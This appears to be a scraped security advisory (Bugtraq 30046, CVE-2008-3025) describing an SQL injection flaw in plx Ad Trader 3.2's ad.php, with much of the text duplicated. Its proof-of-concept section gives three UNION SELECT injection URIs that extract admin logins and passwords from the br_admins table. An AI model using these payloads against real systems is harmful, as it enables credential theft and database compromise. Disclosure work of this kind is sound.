plx Ad Trader 'ad.php' SQL Injection Vulnerability
BID:30046
Info
plx Ad Trader 'ad.php' SQL Injection Vulnerability
| Bugtraq ID: | 30046 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3025 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 01 2008 12:00AM |
| Updated: | May 07 2015 05:27PM |
| Credit: | Hussin X |
| Vulnerable: |
plx Web Studio Ad Trader 3.2 |
| Not Vulnerable: | |
Discussion
plx Ad Trader 'ad.php' SQL Injection Vulnerability
plx Ad Trader is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Ad Trader 3.2 is vulnerable; other versions may also be affected.
plx Ad Trader is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
Ad Trader 3.2 is vulnerable; other versions may also be affected.
Exploit / POC
plx Ad Trader 'ad.php' SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
Attackers can use a browser to exploit this issue.
The following proof-of-concept URIs are available:
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--
http://www.example.com/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--
Solution / Fix
plx Ad Trader 'ad.php' SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
plx Ad Trader 'ad.php' SQL Injection Vulnerability
References:
References:
- plx Ad Trader Homepage (plx Web Studio)